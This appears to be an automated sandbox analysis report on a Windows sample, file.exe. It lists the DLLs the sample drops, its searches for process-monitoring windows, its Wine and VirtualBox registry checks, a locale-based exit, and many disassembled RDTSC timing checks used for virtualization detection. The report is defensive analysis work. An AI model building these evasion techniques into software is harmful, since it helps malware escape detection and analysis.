Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00779860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58184

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F0A second address: B33F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F15 second address: B33F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F19 second address: B33F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F960 second address: B3F99B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB8FCCA77C1h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007FB8FCCA77CCh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FB8FCCA77C4h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push esi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC44 second address: B3FC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC48 second address: B3FC67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C5h 0x00000007 jbe 00007FB8FCCA77B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC67 second address: B3FC6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B400BA second address: B400BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40208 second address: B40218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD6487Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43189 second address: B4318F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4327C second address: B43298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64888h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43298 second address: B432A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8FCCA77BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432A2 second address: B432C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8FCD64885h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432C0 second address: B432C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432C6 second address: B432EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB8FCD6487Ch 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 jnc 00007FB8FCD64876h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432EA second address: B432F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432F2 second address: B43304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43304 second address: B43360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D1B4Dh], edi 0x0000000d push 00000003h 0x0000000f mov dword ptr [ebp+122D1A58h], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FB8FCCA77B8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov esi, 0577DAD1h 0x00000036 push 00000003h 0x00000038 mov esi, 7620C8CEh 0x0000003d call 00007FB8FCCA77B9h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB8FCCA77BAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43360 second address: B4336A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8FCD6487Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4336A second address: B43381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43381 second address: B43398 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8FCD6487Ch 0x00000008 jo 00007FB8FCD64876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43398 second address: B4339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4339C second address: B433A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B433A0 second address: B43409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FB8FCCA77BEh 0x00000012 jmp 00007FB8FCCA77BCh 0x00000017 popad 0x00000018 pop eax 0x00000019 pop eax 0x0000001a jmp 00007FB8FCCA77C0h 0x0000001f lea ebx, dword ptr [ebp+12454FBFh] 0x00000025 mov dword ptr [ebp+122D1AA6h], edi 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d jmp 00007FB8FCCA77C5h 0x00000032 pop eax 0x00000033 push eax 0x00000034 je 00007FB8FCCA77CEh 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43409 second address: B4340D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B434C2 second address: B4353C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jns 00007FB8FCCA77B6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 jmp 00007FB8FCCA77BBh 0x0000001c pop edi 0x0000001d mov eax, dword ptr [eax] 0x0000001f jnc 00007FB8FCCA77C8h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push edi 0x0000002a push edi 0x0000002b jne 00007FB8FCCA77B6h 0x00000031 pop edi 0x00000032 pop edi 0x00000033 pop eax 0x00000034 and esi, dword ptr [ebp+122D2984h] 0x0000003a push 00000003h 0x0000003c sub dword ptr [ebp+122D19B2h], ecx 0x00000042 mov edi, dword ptr [ebp+122D2954h] 0x00000048 push 00000000h 0x0000004a mov edi, dword ptr [ebp+122D28D8h] 0x00000050 mov dh, CFh 0x00000052 push 00000003h 0x00000054 or cx, 5AACh 0x00000059 push B90D3E36h 0x0000005e push esi 0x0000005f push ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6185A second address: B61886 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8FCD6487Ah 0x00000011 jmp 00007FB8FCD64886h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61A90 second address: B61A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61A94 second address: B61AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8FCD64884h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61F99 second address: B61F9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62114 second address: B6211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6211A second address: B6212B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8FCCA77B6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6212B second address: B62145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007FB8FCD64883h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62145 second address: B62151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FB8FCCA77B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622B1 second address: B622B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622B5 second address: B622C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8FCCA77B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622C1 second address: B622D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622D2 second address: B622D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622D6 second address: B622F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD6487Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007FB8FCD64876h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56812 second address: B56818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56818 second address: B5681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6313B second address: B63141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6705D second address: B67061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66126 second address: B6612C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6612C second address: B66130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6B11C second address: B6B122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24D5B second address: B24D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24D61 second address: B24D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DE71 second address: B6DE82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DE82 second address: B6DEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FB8FCCA77B6h 0x00000010 jg 00007FB8FCCA77B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E00D second address: B6E011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E011 second address: B6E015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E29C second address: B6E2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7C9 second address: B6E7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7CD second address: B6E7E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7E1 second address: B6E815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C3h 0x00000009 pop edx 0x0000000a popad 0x0000000b push edi 0x0000000c jns 00007FB8FCCA77BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FB8FCCA77BAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E815 second address: B6E819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7055A second address: B70560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B70560 second address: B70564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B708CE second address: B708DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B708DC second address: B708E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709BB second address: B709C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709C1 second address: B709C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709C5 second address: B709C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71165 second address: B71176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71432 second address: B71438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71438 second address: B71449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B715E3 second address: B71605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8FCCA77BFh 0x00000008 jg 00007FB8FCCA77B6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71605 second address: B7160A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B72511 second address: B72518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B735E7 second address: B73609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8FCD64889h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73609 second address: B7361F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76224 second address: B76228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76228 second address: B7622E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7622E second address: B76239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB8FCD64876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76239 second address: B76247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADA3 second address: B7ADA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADA7 second address: B7ADAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADAB second address: B7ADB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADB1 second address: B7ADCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADCD second address: B7ADD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADD1 second address: B7AE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FB8FCCA77B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 movzx ebx, bx 0x00000026 push 00000000h 0x00000028 add dword ptr [ebp+1245C5E2h], ecx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FB8FCCA77B8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a xor edi, dword ptr [ebp+122D17EBh] 0x00000050 xchg eax, esi 0x00000051 push esi 0x00000052 jnl 00007FB8FCCA77BCh 0x00000058 pop esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7AE3C second address: B7AE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE6D second address: B7BE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE73 second address: B7BE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
